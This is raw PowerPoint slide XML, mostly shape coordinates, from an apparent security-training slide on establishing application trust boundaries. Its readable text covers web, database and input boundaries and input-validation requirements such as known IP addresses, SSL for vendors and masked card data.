                    <a:pt x="1925651" y="719074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925327" y="718651"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1925066" y="718312"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1925327" y="718651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925701" y="719074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925066" y="718312"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1924152" y="673608"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1885442" y="673608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1886077" y="674243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925327" y="718651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925066" y="718312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1961514" y="718312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947672" y="700278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1924152" y="673608"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1885455" y="673623"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1886004" y="674243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1885455" y="673623"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1882187" y="629538"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1841246" y="629538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1885455" y="673623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1924152" y="673608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1906905" y="654050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882187" y="629538"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1792605" y="586232"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1841754" y="630174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1841246" y="629538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882187" y="629538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1861312" y="608838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1836483" y="586613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793240" y="586613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1792605" y="586232"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1785990" y="543687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1739900" y="543687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1740535" y="544195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793240" y="586613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1836483" y="586613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811655" y="564388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785990" y="543687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1740494" y="544165"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1732221" y="502285"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1683131" y="502285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1740494" y="544165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1739900" y="543687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785990" y="543687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1757807" y="520954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1732221" y="502285"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1674685" y="461899"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1622552" y="461899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1622933" y="462153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683639" y="502666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683131" y="502285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1732221" y="502285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1700022" y="478790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674685" y="461899"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1622928" y="462150"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1613609" y="422529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1558290" y="422529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1622928" y="462150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1622552" y="461899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674685" y="461899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638300" y="437642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613609" y="422529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1482869" y="348107"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1419733" y="348107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1491107" y="384937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1558798" y="422910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1558290" y="422529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613609" y="422529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1573149" y="397763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1504569" y="359283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482869" y="348107"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1490599" y="384683"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1491052" y="384937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1490599" y="384683"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1345692" y="313055"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1420114" y="348361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1419733" y="348107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482869" y="348107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1432814" y="322325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413578" y="313182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1346200" y="313182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345692" y="313055"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1268857" y="279526"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1346200" y="313182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413578" y="313182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1358011" y="286766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1341709" y="279654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269365" y="279654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1268857" y="279526"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1267014" y="247523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1189355" y="247523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269365" y="279654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1341709" y="279654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280287" y="252857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1267014" y="247523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1114180" y="189230"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1023112" y="189230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023493" y="189357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1107821" y="217678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1189863" y="247776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1189355" y="247523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1267014" y="247523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200023" y="220599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1117219" y="190246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114180" y="189230"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1107440" y="217550"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1107786" y="217678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1107440" y="217550"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1023463" y="189348"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="956678" y="138811"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="848487" y="138811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937133" y="163068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936751" y="163068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023463" y="189348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023112" y="189230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114180" y="189230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032129" y="161798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956678" y="138811"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="877212" y="116712"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="758444" y="116712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848868" y="138937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848487" y="138811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956678" y="138811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945007" y="135255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="877212" y="116712"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="799179" y="96900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="667004" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758825" y="116840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758444" y="116712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="877212" y="116712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="855853" y="110871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799179" y="96900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="650721" y="64388"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="480187" y="64388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574548" y="79501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574167" y="79501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667385" y="97028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667004" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799179" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="765175" y="88519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672973" y="68580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650721" y="64388"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="508" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="28956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97282" y="30480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96900" y="30480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193801" y="34798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193421" y="34798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290068" y="42037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289687" y="42037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385699" y="51943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385318" y="51943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480568" y="64516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480187" y="64388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650721" y="64388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579247" y="50926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484632" y="35813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388874" y="23113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292481" y="13208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195325" y="5969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97917" y="1524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0950" y="1960372"/>
              <a:ext cx="4984914" cy="363423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860555" y="4459971"/>
            <a:ext cx="1984493" cy="29964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1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Boundary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48464" y="2032567"/>
            <a:ext cx="2567271" cy="300277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1799" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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799" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Boundary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90247" y="4937748"/>
            <a:ext cx="5838574" cy="102335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R="1242322" algn="r" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1465"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Database</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="575772" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1944"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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799" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Boundary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  <a:p>
            <a:pPr defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1849">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126"/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Indicates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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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outside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inside</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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direction</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for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the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30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trust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Boundary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145486" y="5743454"/>
            <a:ext cx="814493" cy="177754"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="814705" h="177800">
                <a:moveTo>
                  <a:pt x="728191" y="105758"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="638175" y="152018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635381" y="160743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642747" y="174967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651383" y="177774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="788044" y="107568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="784098" y="107568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="728191" y="105758"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="814705" h="177800">
                <a:moveTo>
                  <a:pt x="754726" y="92122"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="728191" y="105758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="784098" y="107568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="784160" y="105524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777113" y="105524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754726" y="92122"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="814705" h="177800">
                <a:moveTo>
                  <a:pt x="657225" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="648335" y="2235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="644144" y="9093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="640080" y="15951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642366" y="24853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729165" y="76818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="784987" y="78625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="784098" y="107568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="788044" y="107568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814324" y="94068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="657225" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="814705" h="177800">
                <a:moveTo>
                  <a:pt x="1016" y="53251"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="82181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="728191" y="105758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754726" y="92122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729165" y="76818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1016" y="53251"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="814705" h="177800">
                <a:moveTo>
                  <a:pt x="777875" y="80225"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="754726" y="92122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777113" y="105524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777875" y="80225"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="814705" h="177800">
                <a:moveTo>
                  <a:pt x="784937" y="80225"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="777875" y="80225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777113" y="105524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="784160" y="105524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="784937" y="80225"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="814705" h="177800">
                <a:moveTo>
                  <a:pt x="729165" y="76818"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="754726" y="92122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777875" y="80225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="784937" y="80225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="784987" y="78625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729165" y="7681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914126"/>
            <a:endParaRPr sz="179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4885494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5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5" dirty="0"/>
              <a:t>Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Application</a:t>
            </a:r>
            <a:endParaRPr sz="2499"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6898621" y="4833507"/>
            <a:ext cx="4621596" cy="658958"/>
            <a:chOff x="6900418" y="4833873"/>
            <a:chExt cx="4622800" cy="659130"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6906768" y="4840223"/>
              <a:ext cx="4610100" cy="646430"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610100" h="646429">
                  <a:moveTo>
                    <a:pt x="4610100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4610100" y="646176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610100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6906768" y="4840223"/>
              <a:ext cx="4610100" cy="646430"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610100" h="646429">
                  <a:moveTo>
                    <a:pt x="0" y="646176"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610100" y="646176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="646176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16700" y="1332267"/>
            <a:ext cx="10120534" cy="4101032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729396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From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diagram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 requirements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you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can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define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what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data is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allowed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inside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Boundary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484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Input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Validation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Boundary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requirements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Input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accepted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from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any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connection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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port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8080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Input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accepted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only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from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known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IP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addresses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port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443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Vendors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required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to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SSL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Dat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umed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orm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ymen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ata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m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s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SL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All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credit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card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data is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masked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firewall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079571" marR="5078" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="2249"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-1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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-1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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>another </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>restriction</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-39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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-15" dirty="0">
                <a:solidFill>
